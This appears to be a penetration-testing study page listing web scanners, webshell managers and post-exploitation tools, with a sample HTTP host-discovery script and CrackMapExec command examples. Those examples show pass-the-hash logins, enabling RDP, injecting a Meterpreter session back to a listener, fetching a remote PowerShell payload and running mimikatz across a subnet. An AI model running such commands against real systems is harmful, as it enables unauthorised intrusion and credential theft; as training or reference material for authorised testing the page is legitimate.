
Classified Protection (等保) training

  • Critical information infrastructure

PenTest-Tools

1. domainname: domain-name collection tools

2. webscan: web scanning tools

  • 3xp10it

  • AngelSword

    • CMS vulnerability detection framework written in Python 3
  • AutoSploit

    • Automated Mass Exploiter (remote / external network targets)
  • AZScanner

    • Automatic vulnerability scanner: automatic subdomain brute-forcing, automatic crawling for injection points with detection handed to sqlmapapi, port scanning, directory brute-forcing, service discovery and port scanning across the surrounding subnet, and checks for common framework vulnerabilities.
  • BBScan

    • A fast vulnerability scanner
  • cansina

    • Web Content Discovery Tool
  • Fast_Scan

    • Quick and Dirty full-connect scanner.
    • ./fastscan 192.169.1.1
  • FingerPrint

  • F-MiddlewareScan

    • Automated checking of middleware: port probing -> middleware identification -> vulnerability detection -> obtaining a webshell

    • python F-MiddlewareScan.py -h 10.111.1
      python F-MiddlewareScan.py -h 192.168.1.1-192.168.2.111
      python F-MiddlewareScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6
      
  • GetTitle

    • gettitle.exe 192.168.1/192.168 80,8080,8181,8000 100
  • GitPrey

    • GitHub sensitive-information scanning tool
  • htcap

    • htcap is a web application scanner able to crawl single page application (SPA) recursively by intercepting ajax calls and DOM changes.
  • httpscan

    • httpscan is a small tool for finding web hosts in a given CIDR range. Unlike a port scanner, httpscan discovers web hosts the way a crawler does (plain HTTP requests), so it is comparatively less likely to be blocked by a firewall.

    • ./httpscan.py 10.20.30.0/24 -t 10
      
  • lalascan

  • pentestEr_Fully-automatic-scanner

    • Targeted, fully automated penetration testing
  • w9scan

    • All-round website vulnerability scanner
  • K8Cscan

  • phpsploit

  • RED_HAWK

  • S7scan

  • Scan-T

  • Spaghetti

  • XAttacker

  • truffleHog

  • WAFNinja

  • weakfilescan

  • webvulscan

  • whichCDN

    • CDN detection
  • Sn1per

  • WPSeku

    • WordPress security scanner
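httpscan and GetTitle above both work the same way: send an ordinary HTTP request to every address in a range and record what answers, instead of port-scanning. The following is an added example of that approach in Python, written for this page and not code from either project. It expands a CIDR into http:// URLs for a few ports, fetches each one from a thread pool, and keeps the status code, Server header and <title> of every host that responded. The port list, timeout, thread count and the HTML used for testing are assumptions chosen for illustration.

```python
import ipaddress
import re
import socket
import sys
from concurrent.futures import ThreadPoolExecutor
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)


def expand_targets(cidr, ports):
    """Turn a CIDR such as 10.20.30.0/24 plus a port list into http:// URLs.
    ipaddress.hosts() drops the network and broadcast addresses for us."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [f"http://{ip}:{port}/" for ip in net.hosts() for port in ports]


def extract_title(body):
    """Return the <title> text with whitespace collapsed, or '' if there is none."""
    m = TITLE_RE.search(body)
    return " ".join(m.group(1).split()) if m else ""


def probe(url, timeout=5):
    """GET one URL. Returns (url, status, server_header, title) for anything that
    spoke HTTP, or None if nothing answered. A 401/403/404 is still a live web
    host, so HTTPError is kept; only connection failures and timeouts are dropped."""
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")
            return (url, resp.status, resp.headers.get("Server", ""), extract_title(body))
    except HTTPError as e:  # must come before URLError, it is a subclass
        body = e.read(65536).decode("utf-8", "replace")
        return (url, e.code, e.headers.get("Server", ""), extract_title(body))
    except (URLError, socket.timeout, OSError):
        return None


def scan(cidr, ports=(80, 8080), threads=10):
    """Probe every host:port in the range concurrently; return only live web hosts."""
    with ThreadPoolExecutor(max_workers=threads) as pool:
        results = pool.map(probe, expand_targets(cidr, ports))
    return [r for r in results if r is not None]


if __name__ == "__main__":
    # Usage: python httpdiscover.py 10.20.30.0/24   (default range is an assumption)
    target = sys.argv[1] if len(sys.argv) > 1 else "10.20.30.0/24"
    for url, status, server, title in scan(target):
        print(f"{url}\t{status}\t{server}\t{title}")
```

Because this is just GET traffic, a filter that only watches for SYN scans will not notice it, which is the property httpscan's description relies on; a WAF, reverse proxy or web server log will still record one request per probed host and port, so it is not stealthy against application-layer logging.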

3. Web fuzzing tools

4. Webshell tools

  • antSword
  • Cknife
  • 冰蝎 (Behinder)
  • godzilla

5. Post-exploitation tools

Night

~ Today's vulnerability study ~

~ PayloadsAllTheThings study ~

  • impacket

  • InveighZero

    • Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofer/man-in-the-middle tool
  • mimikatz

  • Active Directory Explorer

  • CrackMapExec

    • CrackMapExec (also known as CME) is a post-exploitation tool that helps automate assessing the security of Active Directory environments.

    • Binary download

    • Basic syntax

    • # use the latest release, CME is now a binary packaged with all its dependencies
      root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip
      
      # execute cme (smb, winrm, mssql, ...)
      root@payload$ cme smb -L
      root@payload$ cme smb -M name_module -o VAR=DATA
      root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
      root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
      root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
      root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
      root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
      root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
      root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
      root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
      root@payload$ cme mimikatz --server http --server-port 80
      
  • ADRecon

    • .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser
      
  • ADAPE

    • Active Directory Assessment and Privilege Escalation Script

    • powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1